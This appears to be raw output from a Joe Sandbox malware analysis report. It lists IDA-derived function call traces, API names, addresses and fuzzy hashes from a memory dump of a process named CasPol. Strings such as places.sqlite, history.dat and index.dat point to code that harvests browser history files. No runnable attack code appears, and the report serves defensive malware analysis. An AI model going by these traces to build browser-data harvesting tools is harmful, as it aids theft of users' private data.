                                                                                                                                                                            • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                                                                                            • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                            • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                          • memset.MSVCRT ref: 00403A55
                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                                                                                          • String ID: history.dat$places.sqlite
                                                                                                                                                                          • API String ID: 2641622041-467022611
                                                                                                                                                                          • Opcode ID: 9ef9f50687dcf4a121c62199c75cab5672ca0efd30876004e019efa0877f52a8
                                                                                                                                                                          • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                                                                                          • Opcode Fuzzy Hash: 9ef9f50687dcf4a121c62199c75cab5672ca0efd30876004e019efa0877f52a8
                                                                                                                                                                          • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                            • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                            • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                          • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00417627
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$File$PointerRead
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 839530781-0
                                                                                                                                                                          • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                                          • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                                                                                          • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                                          • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileFindFirst
                                                                                                                                                                          • String ID: *.*$index.dat
                                                                                                                                                                          • API String ID: 1974802433-2863569691
                                                                                                                                                                          • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                                          • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                                                                                          • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                                          • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$FilePointer
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1156039329-0
                                                                                                                                                                          • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                          • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                                                                                          • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                          • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000), ref: 0040A044
                                                                                                                                                                          • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$CloseCreateHandleTime
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3397143404-0
                                                                                                                                                                          • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                          • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                                                                                          • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                          • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                          • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1125800050-0
                                                                                                                                                                          • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                          • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                                                                                          • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                          • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseHandleSleep
                                                                                                                                                                          • String ID: }A
                                                                                                                                                                          • API String ID: 252777609-2138825249
                                                                                                                                                                          • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                          • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                                                                                          • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                          • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                                                                                          APIs
                                                                                                                                                                          • malloc.MSVCRT ref: 00409A10
                                                                                                                                                                          • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                          • free.MSVCRT ref: 00409A31
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: freemallocmemcpy
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3056473165-0
                                                                                                                                                                          • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                                                                                          • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                                                                                          • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                                                                                          • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: d
                                                                                                                                                                          • API String ID: 0-2564639436
                                                                                                                                                                          • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                                                                                          • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                                                                                                          • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                                                                                          • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memset
                                                                                                                                                                          • String ID: BINARY
                                                                                                                                                                          • API String ID: 2221118986-907554435
                                                                                                                                                                          • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                                                                          • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                                                                                          • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                                                                          • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcsicmp
                                                                                                                                                                          • String ID: /stext
                                                                                                                                                                          • API String ID: 2081463915-3817206916
                                                                                                                                                                          • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                                                          • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                                                                                          • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                                                          • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00000143,00000000,00000000,00000000,?,00409690,00000000,00408801,?,?,00000143,?,?,00000143), ref: 00409552
                                                                                                                                                                          • CloseHandle.KERNELBASE(00000000), ref: 0040957A
                                                                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$??2@CloseCreateHandleReadSize
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1023896661-0
                                                                                                                                                                          • Opcode ID: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
                                                                                                                                                                          • Instruction ID: f35f9952f6e959c636c436af82c7d55a8b84e599ec35ab47be9645748316c481
                                                                                                                                                                          • Opcode Fuzzy Hash: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
                                                                                                                                                                          • Instruction Fuzzy Hash: 0D11D671A00608BFCB129F2ACC8585F7BA5EF94350B14843FF415AB392DB75DE40CA58
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                            • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                                                                                            • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                                                                                          • CloseHandle.KERNELBASE(?), ref: 0040CC98
                                                                                                                                                                            • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2445788494-0
                                                                                                                                                                          • Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                                                                                                                          • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                                                                                          • Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                                                                                                                          • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: malloc
                                                                                                                                                                          • String ID: failed to allocate %u bytes of memory
                                                                                                                                                                          • API String ID: 2803490479-1168259600
                                                                                                                                                                          • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                                                                          • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                                                                                                                          • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                                                                          • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memcmpmemset
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1065087418-0
                                                                                                                                                                          • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                                          • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                                                                                          • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                                          • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                                                                                                            • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                                                                                                          • CloseHandle.KERNELBASE(?), ref: 00410654
                                                                                                                                                                            • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000), ref: 004096EE
                                                                                                                                                                            • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                                                                                                            • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                                                                            • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1381354015-0
                                                                                                                                                                          • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                                                          • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                                                                                          • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                                                          • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memset
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2221118986-0
                                                                                                                                                                          • Opcode ID: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                                                                                                                          • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                                                                                                                                                          • Opcode Fuzzy Hash: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                                                                                                                          • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                          • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                                                                          • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                                                                                          • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                                                                          • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                                                                                                                                                          • Instruction ID: 68238382b965d6cf35967491492c160b6f6d54887ef21f0023ff885919cfaa00
                                                                                                                                                                          • Opcode Fuzzy Hash: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                                                                                                                                                          • Instruction Fuzzy Hash: 695126B5A00209AFCB14DFD4C884CEFBBB9FF88705B14C559F512AB254E735AA46CB60
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                                                                            • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000), ref: 0040A044
                                                                                                                                                                            • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                            • Part of subcall function 0040A02C: CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                                                                                                                                          • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2154303073-0
                                                                                                                                                                          • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                                          • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                                                                                          • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                                          • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000,000000F1,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 0041362A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3150196962-0
                                                                                                                                                                          • Opcode ID: 095a0049c7a0b0aa8adc47b9682ac82dede396c8921c9c5897dae779e37db889
                                                                                                                                                                          • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                                                                                          • Opcode Fuzzy Hash: 095a0049c7a0b0aa8adc47b9682ac82dede396c8921c9c5897dae779e37db889
                                                                                                                                                                          • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                          Memory Dump Source
